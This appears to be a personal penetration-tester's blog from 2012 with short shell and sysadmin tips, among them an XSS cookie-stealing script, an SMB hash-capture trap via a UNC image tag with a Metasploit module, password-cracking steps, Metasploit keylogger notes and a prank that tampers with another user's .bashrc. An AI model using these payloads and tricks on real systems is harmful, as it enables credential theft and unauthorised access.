Wednesday, December 26, 2012

Default Oracle Usernames and Passwords

Metasploit keyscan_start Considerations


Here is a lesson that I learned the hard way. When you use keyscan_start and keyscan_dump, all those keystrokes are stored in RAM on the target machine, NOT on the hard drive. I suspected as much, and upon further reading it's confirmed here:

Normally this would be awesome for forensic reasons, but god damnit, if the person restarts the machine I lose everything. I'm going to start working on a keylogger that continuously sends keystrokes over the wire, just like the javascript keylogger currently does.

I find it incredibly dumb that the only way to retrieve those keystrokes is to manually run keyscan_dump when you feel like investigating the contents. That's not very modular, nor is it easy to build upon. This is me just being a little baby, but seriously, if we're going to make something let's make it awesome...

Thursday, December 20, 2012


Lots of times when I'm on a pentest the status messages I get from trying to auth to an SMB server with certain creds are the same. But sometimes I lolwtf? at them. That's where this handy little page comes in....handy

Thursday, November 29, 2012

SSH File Permissions

If the permissions on your SSH files are out of whack (i.e. id_rsa/config) then ssh will simply ignore them out of security concerns. To fix permission issues you can run the following:

chmod 750 $HOME
chmod -R 700 $HOME/.ssh

This creates the strictest permissions for all the files under .ssh, which will satisfy SSH's requirements for those files. SSH's recommendations and requirements are below (from the manpage):

  • ~/.ssh/id_rsa (OR ANY PRIV KEY) - These files contain sensitive data and should be readable by the user but not accessible by others (read/write/execute). ssh will simply ignore a private key file if it is accessible by others.
  • ~/.ssh/config - Because of the potential for abuse, this file must have strict permissions: read/write for the user, and not accessible by others.
  • ~/.ssh/authorized_keys - This file is not highly sensitive, but the recommended permissions are read/write for the user, and not accessible by others.
  • ~/.ssh/ - There is no general requirement to keep the entire contents of this directory secret, but the recommended permissions are read/write/execute for the user, and not accessible by others.
  • ~/.rhosts - Additionally, this file must be owned by the user, and must not have write permissions for anyone else. The recommended permission for most machines is read/write for the user, and not accessible by others.
  • ~/.shosts - Same as rhosts
  • ~/.ssh/ (OR ANY PUB KEY) - These files are not sensitive and can (but need not) be readable by anyone.
  • /etc/hosts.equiv - It should only be writable by root
  • /etc/shosts.equiv - same as above
  • /etc/ssh/ssh_known_hosts - It should be world-readable
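An added example (not from the original post) that checks a .ssh directory against the rules above and then applies the recommended modes file by file; the function names ssh_perm_audit and ssh_perm_fix are my own.

```shell
#!/bin/sh
# Audit a .ssh directory against the ssh(1) rules quoted above: the directory,
# config, authorized_keys and every private key must not be accessible by group
# or others; .pub files are exempt. Prints each offender, returns 1 if any found.
# Uses 'ls -ld' instead of GNU-only 'stat -c' so it also works on macOS/BSD.
ssh_perm_audit() {
    dir="${1:-$HOME/.ssh}"
    [ -d "$dir" ] || { echo "no such directory: $dir" >&2; return 2; }
    rc=0
    for f in "$dir" "$dir"/config "$dir"/authorized_keys "$dir"/id_*; do
        [ -e "$f" ] || continue              # unmatched glob or missing file
        case "$f" in *.pub) continue ;; esac  # public keys may be world-readable
        # columns 5-10 of 'ls -l' are the group and other bits, e.g. "r--r--"
        bits=$(ls -ld "$f" | cut -c5-10)
        if [ "$bits" != "------" ]; then
            echo "too permissive: $f (group/other = $bits)"
            rc=1
        fi
    done
    return $rc
}

# Tighten exactly what the audit checks. 'chmod -R 700' works too, but it also
# sets the execute bit on plain files; this applies the man page's modes instead.
ssh_perm_fix() {
    dir="${1:-$HOME/.ssh}"
    chmod 700 "$dir"
    for f in "$dir"/config "$dir"/authorized_keys "$dir"/id_*; do
        [ -f "$f" ] || continue
        case "$f" in
            *.pub) chmod 644 "$f" ;;
            *)     chmod 600 "$f" ;;
        esac
    done
}
```

Run ssh_perm_audit first to see what would change; ssh_perm_fix only touches the files the audit looks at.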

Bash Special/Reserved/Internal Variables

Bash can do a WHOLE LOT MORE than most people think. This is because there are a lot of bash features that people don't know about. Take its special reserved variables for instance:

You can make your bash scripts do some pretty complex stuff using some of those variables.

Reserved variables are also another reason it's suggested NOT to have your variables be all in UPPERCASE, because you never know what you might accidentally use.

For instance:

cat -n file.txt | grep $LINENO # won't work as expected
cat -n file.txt | grep $lineno # will work as expected

This is because $LINENO has a special meaning: it is the line number of the script line it is being used on.

So if the $LINENO variable is used on line 15 of the script, it will ALWAYS grep for the 15th line of file.txt. $lineno is lower case, and therefore a completely different variable, which is defined by you.

Wednesday, November 28, 2012

SSH Failover

You can have SSH iterate through a list of servers until it finds the one that works.

for i in $(cat servers.txt); do
    if ssh -o ConnectTimeout=10 $i; then
        echo "$i is the one that works"
        break   # stop at the first server that answers
    fi
done

The ConnectTimeout option specifies that if it can't make a connection in the specified time, then it stops trying and moves on to the next iteration. Otherwise you can wait the default of 45 seconds.

My suggestion is to have the servers.txt file actually be the host entries in ~/.ssh/config:

Otherwise, just type out:

Simpler SSH Tricks

So last time I said that basically you had to create a bunch of reverse port forwards to get that whole odd tunnel system to work. Well, you actually don't.

C still has to have a reverse tunnel to B, but on A all you have to do is create a local port forward. So, on A:
ssh -L $local_listen_port:localhost:$remote_listen_port $user@$B

Now just:
ssh -D localhost:$local_socks_port $user@localhost -p$local_listen_port

Saturday, November 24, 2012

Stupid SSH Tricks - Securely jumping NATs

I have 3 machines - A,B,C.
A and C are two residential networks that are behind typical NAT routers.
B is a VPS on the internet.

My problem is that I'm at a friend's house, and I need to check my torrent downloads via a webserver on my home's internal network. How can I do this without actually exposing any listening ports to the internet?

So, basically I want to connect from A to C in order to browse several servers in C's network.

This is how to do it without opening any publicly listening ports. (The easy way is just to have C listen on B's public interface, but that raises security concerns.)

1. Have C create a remote port forward to a port on B's localhost
i.e. (from C's terminal)
ssh -R 6000:localhost:22 user@vps

2. Have A create a remote port forward to a port on B's localhost
i.e. (from A's terminal)
ssh -R 6001:localhost:22 user@vps

3. Have B create a remote port forward between A and C via the local ports
i.e. (from B's terminal)
ssh -R 6002:localhost:6000 localhost -p6001

4. Have A set up a socks connection to the new local port listening on A
i.e. (from A's terminal)
ssh -D localhost:8080 localhost -p6002

5. Point A's browser to use localhost:8080 as a socks proxy. This now will tunnel all the requests from that browser over the ssh tunnels to C's internal network.

My suggestion is that you keep C always connected to B. This allows you to set up all the tunnels with one long command from A's terminal:

ssh -R 6001:localhost:22 user@vps -t ssh -R 6002:localhost:6000 localhost -p6001 -t ssh -D localhost:8080 localhost -p6002

It's important to note that you don't TECHNICALLY need to do that many reverse tunnels. 1 reverse tunnel from C to B, and then a local forward from A to B is really all that's needed. But, to each his own...

Friday, November 23, 2012

netstat -ntlup for OSX - Viewing open network connections

netstat -ntlup is a command I run often in Linux to give me a quick rundown of what is listening on what port. Unfortunately if you try to do that in OSX it pukes, and cries, and wants its mommy.
Enter lsof - one of the big boy binaries on the lot.
The following command will list all established and listening sockets open on your machine, sorted, along with the process name, the state, the source, and the destination. Needless to say, I like this command:

lsof -i | grep -E "(UDP|LISTEN|ESTABLISHED)" | awk '{print $10, $1, $8, $9}' | column -t | sort

Monday, November 19, 2012

Download DerbyCon 2012 Videos

DerbyCon videos are hosted for free at I simply made it easier to download all of them. I suggest copying all of these into a file, e.g. day1, and grabbing them using "wget -i day1". That way you can walk away and come back a while later to watch them.

DAY 1:



OSX Trash Bin Wont Empty

The Mountain Lion update has made my mac much worse. One of the issues I've found is that the trash bin won't finish emptying for some ungodly reason. It will just sit there, saying it has to delete like 2000 items, and it will just never finish. Well, luckily there is an easy way to do it manually.

A user's trash bin is stored in their home directory, under "~/.Trash". All you have to do is go into that directory and just 'rm -rf' everything there. Or if you are paranoid about the hard drive sectors, you can always do a 'rm -rfP', which will overwrite the files 3 times before releasing the sectors as free.


rm -rfP ~/.Trash/*

Monday, November 12, 2012

Capturing SMB hashes over the internet

I like leaving this enabled on my VPS just for fun sometimes. You can capture people's SMB hashes remotely using a UNC path to reference resources. So when your browser loads my page, it sees the resource that it thinks exists on some SMB server somewhere, and IE will automatically throw its credentials at it. IE does this for a "seamless user experience". Well, luckily for us that means a "seamless user pwn".
So on your VPS, modify index.html at the root of your web server to include this:
<img src="\\\cats.gif" />
and then run as root:
msfcli auxiliary/server/capture/smb JOHNPWFILE='/root/testsmbcapturefile' E

Friday, November 9, 2012

Disabling upstart jobs

Have you used rcconf/chkconfig to disable services from booting up? Have you even checked the correct rc directory to see if it starts with a "K" vs an "S", and services are still booting up? You should probably check if the service/daemon was converted to an upstart job.

System upstart jobs are found in /etc/init/

The simplest way to disable the service from starting is to rename it. So, for example, the service "smbd" would be stopped from starting like this:

mv /etc/init/smbd.conf /etc/init/smbd.conf.disabled

This way, you can keep the original configuration file and it will be plainly noticed that it's "disabled".

Thursday, November 1, 2012

Show who ran that sudo command

When you have a server used by many people it's often understood that you should be considerate when running certain programs or if you plan on utilizing lots of CPU. Sometimes that consideration flies out the window. When that happens I like to track down who the douchebag is. Here are some ways you can find out the person.

pstree -aUhu
Run that command and you will see a pretty tree being drawn to your terminal. Reading through the output will show you the commands, their arguments, what process is the parent, and if the user changed. This command has yet to fail me in determining process ownership.

Grab the PID of the process in question using either 'pidof' or just copying it out of 'ps aux'. Once you have the PID, cat the file above (while replacing "PID" with the copied PID) and it will output the inherited environment variables of the process, which includes the "SUDO_USER=jim" variable.
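As an added example (not the post's own), a script that reads a process's inherited environment the way described above and sweeps the whole box for sudo-launched processes; it assumes Linux procfs, where that file is /proc/PID/environ, and the function names sudo_user_of and sudo_procs are mine.

```shell
#!/bin/sh
# Who launched this process through sudo? Assumes Linux procfs: /proc/PID/environ
# holds the environment the process inherited, NUL-separated, so plain 'cat'
# prints it as one run-together line; tr turns it into one VAR=value per line.
sudo_user_of() {
    envfile="/proc/$1/environ"
    # unreadable means a wrong pid, a kernel thread, or someone else's process
    [ -r "$envfile" ] || return 2
    user=$(tr '\0' '\n' < "$envfile" | sed -n 's/^SUDO_USER=//p')
    [ -n "$user" ] || return 1          # no SUDO_USER: not started through sudo
    printf '%s\n' "$user"
}

# Sweep every process you are allowed to read and list the ones that came
# through sudo: pid, the real user behind it, and the command line.
sudo_procs() {
    for d in /proc/[0-9]*; do
        pid=${d#/proc/}
        user=$(sudo_user_of "$pid" 2>/dev/null) || continue
        cmd=$(tr '\0' ' ' < "$d/cmdline" 2>/dev/null) || cmd='?'
        printf '%s\t%s\t%s\n' "$pid" "$user" "$cmd"
    done
}

# usage: sudo_user_of <pid>      or      sudo_procs
```

Reading another user's environ needs the same uid or root, so run the sweep with sudo when hunting someone else's hog.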

Tuesday, October 23, 2012

Nmap & suid

If you come across a machine or web app that has nmap with the suid bit set, then the following article will be of interest to you:

Friday, October 19, 2012

Mount NTFS ISOs in linux

watch ALL the things

So I'm waiting for a drive to clone and I like to see both the byte size AND the human readable byte size. I know you can watch a repeating command using "watch", dur...but two commands at once?

It's actually much simpler than it sounds. All watch does is pass the arguments to 'sh -c'. So, it follows that the following line must work:

watch ls -l file \; ls -lh file

And yes, it does. All you need to do is escape the command terminator ';' so it will be passed as an argument.

now to watch paint dry...

Wednesday, October 17, 2012

OSX Alert Boxes

Found this on a stackoverflow post; apparently running the following line pops up a box with the specified text:
osascript -e 'tell app "System Events" to display dialog "ZOMGLULZ"'

Monday, October 8, 2012

Actual XSS Impact

Popping up alert boxes as a PoC for XSS is cute and all, but sometimes you want to see the actual attack. The following javascript line will make a GET request to and append the document.cookie to the request. You then log into that server, read your apache logs, and you have the cookies for that user. Replace your browser's cookies with the captured ones and, depending on the site, you could log in as them.
<script>a = new Image(); a.src = "" + document.cookie + "end"; </script>
This is an actual attacker's line, don't be stupid.

Generate NTLM hashes via command line

Turns out the NTLM hashing algo is super simple. It just takes the string you give it, converts it to UTF-16LE and then outputs the MD4 of that. You can generate your own fairly simply at the command line:

iconv -f ASCII -t UTF-16LE <(printf "lolwut") | openssl dgst -md4
What this does is use a fairly popular unix utility, "iconv". -f is the "from" encoding, which in this case is just simple ASCII, and -t sets the "to" encoding. It reads in the string using printf and pipes that to openssl for the digest. The result is the NT hash of the string (or password, if you want to look at it like that) "lolwut".

Create a function and place it in .bashrc:

ntlm_hash () {
    # printf '%s' so a % in the password is not treated as a format string.
    # On OpenSSL 3, MD4 lives in the legacy provider: add
    # "-provider legacy -provider default" to the dgst command if it errors out.
    iconv -f ASCII -t UTF-16LE <(printf '%s' "$1") | openssl dgst -md4
}

Now just type "ntlm_hash lolwut" to get the same result.

Stealth cURL

I use curl all the time, almost every day. Unfortunately curl thinks it's a good idea to use its own user agent string when grabbing content from sites. This is a problem because sometimes devs code in exceptions for different browsers, so the page you get back for Internet Explorer is different than the one you get for Firefox. Luckily, the curl devs included the ability to change your user agent string to whatever you want.

Normally curl's agent string is this (curl from my macbook):
User-Agent: curl/7.24.0 (x86_64-apple-darwin12.0) libcurl/7.24.0 OpenSSL/0.9.8r zlib/1.2.5

That is grabbed directly from the header that is sent to the server (captured using netcat). As you can see it's fairly obvious that the person is on a mac and they are using curl. To change this user agent so it appears as if Firefox is grabbing it, we use the -A option. First we grab the valid user agent string we decide to use from In this case I'm going to use the latest Firefox one; the command line is as follows:

curl -A 'Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2'
Now if you look at your logs, you will see the user-agent string reflects the new string.

curl supports config files using -K, so you can just place it in a file along with whatever else you want to use and reference the config file; a nice example is in the man page.

Wednesday, October 3, 2012

Regex for PHP serialized data

This is the regex string to use when searching through a document for serialized data.


I got it from here:

Tuesday, September 25, 2012

John The Ripper Formats

Friday, September 14, 2012

VIM commands in GUI text editor

I used TextMate for quite a long time, but my biggest gripe was that I couldn't run VIM commands in it natively. Then my friend told me about MacVIM ( I've been enjoying it quite a bit ever since I downloaded it.

It allows me to run all the VIM commands I'm used to while still having the clickyness of a GUI.


Tuesday, August 14, 2012

Troll Tricks #2

"Let me log into the server to check my mail...ALRIGHT, WHO THE FUCK DID THAT?"
*Suppressed childish giggle*

Who wouldn't want to be greeted by nyan cat when they log into their terminal? It's so cute and fluffy and pop-tarty. I think some people don't quite appreciate the grace and elegance of the whiskered space-poptart. Let's enhance their experience with the gift of NYAN.

sudo -s "echo telnet >> /home/user/.bashrc"

Now whenever they decide to join the server, they can join the fun!

*What this basically does is telnet straight to a server that NYAN's the crap out of them until they enter the telnet escape sequence 'ctrl+[', when they then type quit + enter; it drops them back to their shell.
**This is the nice way of doing it; you can always put in an "exit" right after so it doesn't drop them to a shell.

Troll Tricks #1

"Hey steve, what services are running on our server"
"Let me see here, wait...what the fuck? we are running LOLCATS and LOLDONGS and ftp?"
* suppressed childish giggle*

In our first installment of troll tricks, I shall teach you how to modify the port descriptions in Linux. Typically when you run a command like "netstat -tlp" or "ss", it will give you the actual name of the port that the number is associated with. 22=ssh, 23=telnet, 25=smtp, and so on. What a bunch of people don't realize is that you can change the text of the reported port, so that 22=LOLCATS, 23=LOLDONGS, and whatever else you'd like. The best part is the changes take place immediately and have no real impact on the server whatsoever.

The secret key to the whole troll is a certain file:

This is the file that holds all the corresponding associations. Simply run:
sudo vi /etc/services

and modify whatever entries you'd like. Now, the next time someone runs a command that interprets port number to port name, it will give the new port name.

It's just that simple. Change back when you are done and everything is back to normal.

Monday, August 13, 2012

Test Internet Bandwidth via command line

Got this from a stackoverflow article:

wget --output-document=/dev/null

Tuesday, August 7, 2012

How to bridge two linux interfaces

Create the bridge table:
brctl addbr bridgename

then add the interfaces to the bridge (brctl addif takes the bridge name first, then the interface)
brctl addif bridgename eth1
brctl addif bridgename eth2

Wednesday, July 18, 2012

List entire directory paths for remote FTP directory

I use this all the time to quickly search for fancy filenames on FTP servers that allow anonymous logins. It's basically a for loop that logs into each server, runs the find command, which outputs absolute paths for directories and files, and writes that to a file named after the IP.

for i in `cat ftp_anon_hosts`; do echo FTP LIST $i; lftp -e "find;QUIT" anonymous:anonymous@$i > ftp/$i; done

Tuesday, July 17, 2012

Rainbow Tables for rcracki

Download links are all right here:

Thursday, July 12, 2012

Empty/null hashdump (LM/NTLM)


is the LM/NTLM hash pair for blank passwords. You can create this pair by running

"net user kittens /add"

and it will result in:


This is an easy way to tell if the hash you have is actually a password or not.

Wednesday, June 27, 2012

Sublime 2 command line starter

TextMate simply needed you to type "mate file1" to open file1 in the TextMate gui.

Sublime 2 doesn't have that. Well that's stupid. So I made my own:

alias sublime='open -a "/Applications/Sublime Text"'

Now just type "sublime file1" and it will open the file in the gui, just like TextMate.

Updating metasploit in brew

Straight from brew when you first install metasploit:

Metasploit can be updated in-place by doing:
  cd `brew --prefix metasploit`/libexec/
  svn up

Monday, June 4, 2012

My tech/infosec subreddits

Bookmark this page for good times:

Awk from pattern to End Of File

awk '/regex/,EOF' file1

Thursday, May 31, 2012

From LM to NTLM passwords in John the Ripper

So you dump some passwords from a machine and you see it contains LM and NTLM hashes. Obviously LM is quicker to crack so you go for that one first and it gives you the uppercase plaintext password:
./john --format=lm /root/hashes

which provides the plaintext uppercase password "KITTENBOOTIES". Great, now we need the real password, the one with upper/lower case. We do this easily by supplying the "KITTENBOOTIES" password as the wordlist (with mangling) to john again. So do this:
echo KITTENBOOTIES > wordlist1
./john -rules --format=nt /root/hashes --wordlist=wordlist1
This will output the proper password of "kiTTenBooTiES"


Tuesday, May 29, 2012

shut bonjour up

Bonjour makes a lot of annoying noise from a mac when you are trying to do some traffic analysis. You can help that by disabling bonjour's multicasts with:
sudo defaults write /System/Library/LaunchDaemons/ ProgramArguments -array-add "-NoMulticastAdvertisements"

SANS guide to basics of securing datacenters and their location

Friday, May 18, 2012

Make your bash usage/movement faster and more efficient

Sudo doesn't work with "&&" and various other bash keywords

Let's say I want to run apt update and upgrade one after another. Typically you do this with:

apt-get update && apt-get upgrade

Unfortunately, oftentimes you need root permissions to do that. So a person will usually simply type:

sudo apt-get update && apt-get upgrade

And if you hit enter, "apt-get update" will run successfully and "apt-get upgrade" will fail. This is due to the fact that when you hit enter, bash has to interpret the line you just submitted. And according to the rules of bash, your line was interpreted to mean three things. First run "sudo apt-get update", then if that returns an exit code of 0, continue to "apt-get upgrade".
What you want to do is send your WHOLE line to sudo for execution. You do this with the "-s" argument of sudo, so that:

sudo -s 'apt-get update && apt-get upgrade'

Of course my short way is usually simply typing "sudo !!" after I mess up the line; it works just fine.

Thursday, May 17, 2012

Learning to love the man

Manpages are awesome. Some people tend to think there are only manpages for programs, which is completely not true. Take for example "man ascii" or "man hier", which display the ascii table and an explanation of the purpose of each unix directory respectively. You can discover where the manpages on your system are located by executing 'manpath'. This will output a list of directories in a similar format to "echo $PATH". Look through the directories to find the 7zipped files containing the manpage data.

I've gotten into the habit of opening each one just out of curiosity. It's actually kind of fun if you have nothing to do.

SSH Inception

I must go deeeeper -_-

I have a box on a network that is only accessible by connecting to multiple SSH boxes in succession. The "-t" option in ssh allows me to go straight through all the boxes using one line:

ssh -t ssh user@homeserver -t ssh user@home-desktop

You literally just chain together as many ssh connections as you'd like. They just pass the arguments on and on. If you alias that to something like:

alias et-phone-home="ssh -t ssh user@homeserver -t ssh user@home-desktop"

then you should be all set.

Thursday, May 10, 2012

Supplying a file to metasploit rhosts

Apparently lots of people don't know you can do this... I will often parse things like FTP hosts into a file and then supply that file as the value of the RHOSTS option in metasploit. This makes it much easier for me to supply a crapton of hosts without actually typing much of anything.

msfcli auxiliary/scanner/ftp/anonymous RHOSTS=file://root/clients/clientname/nmap/ftphosts E

Apparently it only takes absolute paths, unfortunately, but if you're using msfcli instead of msfconsole, why not use bash to your advantage?

msfcli auxiliary/scanner/ftp/anonymous RHOSTS=file://$(pwd)/ftphosts E

That line works great if you're 10 directories deep and are too lazy to type.

I noticed I didn't actually talk about msfconsole, in case it wasn't obvious you do "set rhosts file:/root/blah/ftp.hosts" or whatever your file is and it will take it.

Doesn't work if the module only takes one host though :(

Delete conflicts in known_hosts

Oftentimes I will connect to an ssh server in one network and do some work. Later on, I will move somewhere else and connect to some other network and have to ssh in. Incidentally I'm ssh'ing into two different servers that happen to have the same IP (even though they are two completely different networks). I know what's going on here and I'm doing it all on purpose. Unfortunately ssh still likes to freak out that this IP now magically has a new public key. cool story bro, I already knew.

I got sick of having to go into known_hosts and delete that entry every time this happened. ssh will always tell you the line number that contains the conflicting key, so all I have to do is delete that line from known_hosts and bam, I'm done. So I came up with this little function to make my life easier:

ssh-del-line() {
    if [[ -z $1 ]]; then
        echo 'Deletes the specified linenumber from ~/.ssh/known_hosts'
        echo 'Usage: ssh-del-line linenumber'
    else
        # "${1}d" is a sed line address; "/$1/d" would delete every line matching $1 as a pattern
        sed -i "${1}d" ~/.ssh/known_hosts   # BSD/macOS sed needs: sed -i '' "${1}d" ...
    fi; }

Wednesday, May 9, 2012

A better way to expand hosts in a subnet

Before I mentioned that you could expand the hosts in a subnet by using bash brace expansion. While that works fine, if you have a file with 40 different CIDR subnets in it, it can be REALLY annoying. In walks nmap.
Nmap has a scan feature called list scan that will output the IPs to be tested. All you need to do is supply it with a range/file-with-ranges and it will output the IPs, one per line. The output may be a little ugly so I created a quick function to parse out just the IPs:

expandrange() {
    if [[ -z $1 ]]; then
        echo 'Expands the subnets/ranges provided in the first argument to output in the second argument (file)'
        echo 'Usage: expandrange range.cidr.txt range.long.txt'
    else
        # field 5 of "Nmap scan report for 10.0.0.1" is the address; -n keeps rDNS names out of it
        nmap -sL -n -iL "$1" | grep 'Nmap scan' | cut -d ' ' -f 5 > "$2"
    fi; }
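An added example, not from the post: a pure-shell expander with the same file-in, file-out interface as expandrange() for boxes that don't have nmap; cidr_expand and cidr_expand_file are hypothetical names, and host bits are masked off so 10.0.0.5/30 yields 10.0.0.4 through 10.0.0.7.

```shell
#!/bin/sh
# Expand a CIDR range (or a bare address) to one IP per line using only shell
# arithmetic. Needs a shell with 64-bit integers (bash, dash on 64-bit hosts).
cidr_expand() {
    cidr="$1"
    ip="${cidr%/*}"
    bits="${cidr#*/}"
    [ "$ip" = "$cidr" ] && bits=32              # bare address: treat as /32
    case "$bits" in
        ''|*[!0-9]*) echo "bad prefix length in $cidr" >&2; return 1 ;;
    esac
    if [ "$bits" -gt 32 ]; then
        echo "bad prefix length in $cidr" >&2
        return 1
    fi
    # split the dotted quad into four octets by word-splitting on '.'
    old_ifs=$IFS; IFS=.; set -- $ip; IFS=$old_ifs
    [ $# -eq 4 ] || { echo "bad address in $cidr" >&2; return 1; }
    n=$(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
    size=$(( 1 << (32 - bits) ))
    start=$(( n & ~(size - 1) ))                # clear host bits: 10.0.0.5/30 -> 10.0.0.4
    i=$start
    while [ "$i" -lt $(( start + size )) ]; do
        printf '%d.%d.%d.%d\n' $(( (i >> 24) & 255 )) $(( (i >> 16) & 255 )) \
                               $(( (i >> 8) & 255 ))  $(( i & 255 ))
        i=$(( i + 1 ))
    done
}

# File version with expandrange()'s interface: ranges one per line in $1 (blank
# lines and '#' comments ignored), expanded addresses written to $2.
cidr_expand_file() {
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in ''|'#'*) continue ;; esac
        cidr_expand "$line"
    done < "$1" > "$2"
}
```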

Tuesday, May 8, 2012

Cisco VPN - Fix for Error 51: Unable to communicate with the VPN subsystem

sudo kextload /System/Library/Extensions/CiscoVPN.kext

CLI Twitter and Oauth

Since twitter no longer allows the "basic" authentication mechanism for posting tweets, it has moved over to a much more secure alternative: OAuth

Before it was as easy as creating a cURL line to post the contents to the twitter api. Things have gotten more complicated since then. I could describe everything, but someone else has already done a fine job of the walk-through:

Sunday, April 1, 2012

Your MD5 is wrong

This is an annoying display of ignorance on the part of many people at certain conferences. They will enter a contest and often times the answer must be submitted in the form of an md5 hash. So they will solve the puzzle and the secret key to give them points will be "kittens". They need the MD5 of the string "kittens" so they run the following:

echo 'kittens' | md5sum

They submit that hash to the scoring engine and it says INCORRECT, TRY AGAIN. "Well wtf...let's check our answer again". *1 minute later* "yeah it's definitely right, their scoring engine must be broken or something"

I've heard that muttered all too often at contests and it makes me cringe. Here is what went wrong: the scoring engine is working perfectly fine, you just don't understand how echo works. It helps if we look at things with our hexray vision.

echo 'kittens' | xxd -p

You see that? What's that last character? '0a' - if you look up what '0a' means in the ascii table (man ascii), you will see that it represents the new line. echo, BY DEFAULT, appends a new line to whatever string you wrote. That, folks, is what fucked up your hash.

echo -n 'kittens' | xxd -p

Now the 0a is gone. Now pipe your new echo command into md5sum and you have the correct hash the scoring engine was expecting.

You could avoid the whole issue if you used printf instead of echo. To visualize this:

printf kittens | md5sum
84169a8d5b3289e8ece00d7735081b53  -

echo kittens | md5sum
f261adc7c891836ecc58c62fb80c6e34  -

echo -n kittens | md5sum
84169a8d5b3289e8ece00d7735081b53  -

Just an FYI: apparently the BSD 'md5' utility has a -s string argument that does it all in one go:

md5 -s kittens
MD5 ("kittens") = 84169a8d5b3289e8ece00d7735081b53
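An added example (not the post's code) that wraps the point above in portable functions, so you can check the last byte before you hash; the function names are mine and the expected values are the ones printed above.

```shell
#!/bin/sh
# Hash exactly the bytes you mean to. The trap explained above: echo appends a
# newline (0a) and md5sum hashes it too. Works with GNU md5sum and BSD/macOS md5.
_md5_stdin() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum | cut -d ' ' -f 1
    else
        md5 -q
    fi
}

# The hash a scoring engine expects: the bare string, no trailing newline.
md5_string() { printf '%s' "$1" | _md5_stdin; }

# What 'echo kittens | md5sum' actually computes: the string plus "\n".
md5_echo_style() { printf '%s\n' "$1" | _md5_stdin; }

# Print the last byte of stdin in hex; if it says 0a you are about to hash a newline.
last_byte_hex() { od -An -tx1 | tr -d ' \n' | tail -c 2; }

# usage: md5_string kittens        -> 84169a8d5b3289e8ece00d7735081b53
#        printf '%s\n' kittens | last_byte_hex   -> 0a
```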

Bad Passwords and Password Complexity

I've heard this time and time again: "We are ok, we require password complexity". lulz, are you serious? I'm not even going to get into how bad windows "password complexity" or the rest of their policies are. I'm just going to remind people of this one simple truth:

Password policies only apply on new passwords.

Which means, if you had accounts before you enabled the policies, you may still be at risk for accounts with password of password, or same as username, or other really retarded "it would never happen to me" passwords.

This is the exact reason why I STILL find weak passwords in environments where password complexity is on, minimum password length of like 20. jimbob's password is still jimbob, because he created that password before the policies were enacted.


Well, you could set every person's password to require a change on next login, and then set the password change interval to every 30 days. But that's not enough. Because you could force every user to reset their password on login, but if there are accounts not being actively used, they will simply ask the attacker to change their password.

What I would do is this:

1. Temporarily turn off the account lockout threshold on the domain.
2. get a list of every user on every domain
3. use metasploit or medusa to try a decently sized dictionary file against all the users
4. make a note of all the users with weak passwords and either disable that account or change the password yourself
5. reenable the lockout threshold to something reasonable, like 3 or 4
6. make sure password complexity is on
7. make sure minimum password length is on, I would make it 15 to kill all chances of LM hashes being stored.
8. disable LM hashes ery'where

You also want to make sure to write up a basic "don't be an idiot with your passwords" email to distribute. Make it humorous so that it's memorable; this way when someone is breaking the policy, it will be funny to their coworkers to belittle them. Make the minions do your policing for you.

Some simple "Human Password Policies"
1. Never write down your password anywhere - thats what your brain is for
2. Never give out your password to anyone; you don't give your safe combination to anyone, do you?
3. You no longer have a Pass-"word", you have a Pass-"phrase", make it a sentence, a lyric, something funny only you will remember.
4. Like your wife said, the longer the better.

Wednesday, March 21, 2012

How to mount a drive as another user

This was a case of one of those issues where you constantly search for an answer only to have it staring you in the face the whole time *facedesk*

If you want to mount a drive as another user or have its group as something else, simply place uid=xxxx and/or gid=xxxx in the mount options.

For example:
mount -t vfat /dev/sdb1 /mnt/kittens
will mount with root permissions (BOOOOOOO)
mount -t vfat /dev/sdb1 /mnt/kittens -o uid=1000,gid=1000
will mount as the user that is uid=1000 with group permissions of gid=1000

Now my hacked appletv will properly read that mounted drive for all my media crap. sweetities.

Persistent SSH Tunnel

I always have a box reverse ssh to one of my other boxes. This tunnel needs to stay up at all times and it needs to come back after restarts. This is the solution:

Firstly I need to know exactly what command I will use for the reverse connection. This is mine:
  • ssh -i /home/loldongs/.ssh/lin -N -T -R 4510:localhost:22
Great, now I need a "watcher" script that will constantly check if the connection is up; if so, do nothing; if not, start the damn thing.

#!/bin/sh
# make sure a process is always running.

export DISPLAY=:0 # needed if you are running a simple gui app.

process='ssh -i /home/loldongs/.ssh/lin -N -T -R 4510:localhost:22'
makerun='ssh -i /home/loldongs/.ssh/lin -N -T -R 4510:localhost:22'

# grep -v grep drops the grep command itself, which would otherwise always match
if ps ax | grep -v grep | grep "$process" > /dev/null; then
    : # already running, nothing to do
else
    $makerun &
fi

I found this somewhere on the internet, I'm loving it. I mainly love it because all I have to do is call this script from cron every minute and I ensure that the connection is never down for more than 60 seconds.

Synchronizing torrent downloads

    I dual boot between win7 and ubuntu. The problem is when i log into one of those, typically i will sit in it for quite a long time. I'm also an impatient man so I dont want to only be able to download torrents while in only one or the other.
    I want to be able to download the same torrent whether im in linux, windows, or your mothers arse. I noticed that the majority of torrent clients will/can ask for 3 different folders.

  • A "completed" folder where the files will be moved upon full completed download
  • A "session" folder where the client stores files letting it know where the torrent is in the download
  • A "watch" folder that the client will constantly look at to integrate new torrents
I have many harddrives so I decided to allocate one of them to my torrent downloads where i can later organize into the different categories after download (read: bored).

This drive is mounted on my machine at /media/tdrive/
I ran the following commands on that drive to create the folders that hold all the torrents and such.

  1. mkdir /media/tdrive/torrents; cd $_
  2. mkdir torrents-watch
  3. mkdir torrents-completed
  4. mkdir torrents-session
Now that the folders are set up, you will have to configure your torrent clients to point to those directories. For rtorrent you can easily do so in .rtorrent.rc:

# Default directory to save the downloaded torrents.
directory = /media/tdrive/torrents/torrents-completed

# Default session directory. Make sure you don't run multiple instance
# of rtorrent using the same session directory. Perhaps using a
# relative path?
session = /media/tdrive/torrents/torrents-session

# Watch a directory for new torrents, and stop those that have been
# deleted.
schedule = watch_directory,5,5,load_start=/media/tdrive/torrents/torrents-watch/*.torrent 

Now when I start rtorrent on linux, it will scan through the dirs and pick up the ones that still need to be downloaded. The same happens with utorrent in windows.


Dump Mac Ram Contents

My company installed AV and I saw it had a password with it. I wanted to know what that was so I decided to dump my RAM. Using this:

